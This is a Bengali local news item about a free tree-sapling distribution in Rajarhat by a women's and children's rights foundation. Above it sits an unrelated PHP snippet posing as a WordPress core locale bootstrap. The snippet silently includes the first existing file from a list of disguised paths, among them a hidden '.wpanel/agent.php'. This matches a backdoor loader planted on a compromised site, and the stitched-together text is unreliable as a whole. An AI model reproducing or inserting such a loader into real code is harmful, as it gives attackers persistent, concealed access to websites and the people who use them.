// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } }
এশিয়ান নারী ও শিশু অধিকার ফাউন্ডেশন রাজারহাট উপজেলা শাখা কমিটির উদ্যোগে পরিবেশের ভারসাম্য রক্ষায় বিনামূল্যে গাছের চারা বিতরণ করা হয়।
২৯ সেপ্টেম্বর রোজ শুক্রবার বিকাল ৪ ঘটিকায় রাজারহাট বাজার থেকে এই কর্মসূচির আনুষ্ঠানিক উদ্বোধন করা হয়।
রাজারহাট উপজেলা শাখা কমিটির সভাপতি মোঃ শফিকুল ইসলাম এর সভাপতিত্বে প্রধান অতিথি হিসেবে উপস্থিত ছিলেন রাজারহাট উপজেলা চেয়ারম্যান জাহিদ ইকবাল সোহরাওয়ার্দী বাপ্পী।
উক্ত কর্মসূচির উদ্বোধন করেন এশিয়ান নারী ও শিশু অধিকার ফাউন্ডেশনের প্রতিষ্ঠাতা ও মহাসচিব শিশুবন্ধু মুহাম্মদ আলী।
উদ্বোধনী বক্তব্যে মুহাম্মদ আলী বলেন, বর্তমান বিশ্ব জলবায়ুর প্রভাবে আজ চরম হুমকির মুখে। এই অবস্থার জন্য দায়ী গাছ পালা কমে যাওয়া। তাই এশিয়ান নারী ও শিশু অধিকার ফাউন্ডেশনের উদ্যোগে পরিবেশের ভারসাম্য রক্ষায় দেশব্যাপী আমরা গাছের চারা বিতরণ প্রকল্প বাস্তবায়ন করে যাচ্ছি। তিনি আরও বলেন আমরা গাছ বিতরণ করছি আপনারা পরিচর্যা করবেন।
এই সময় উপস্থিত ছিলেন, এশিয়ান নারী ও শিশু অধিকার ফাউন্ডেশন রাজার হাট উপজেলা শাখার সাধারণ সম্পাদক মোঃ আবু হানিফ সহ অন্যান্যরা।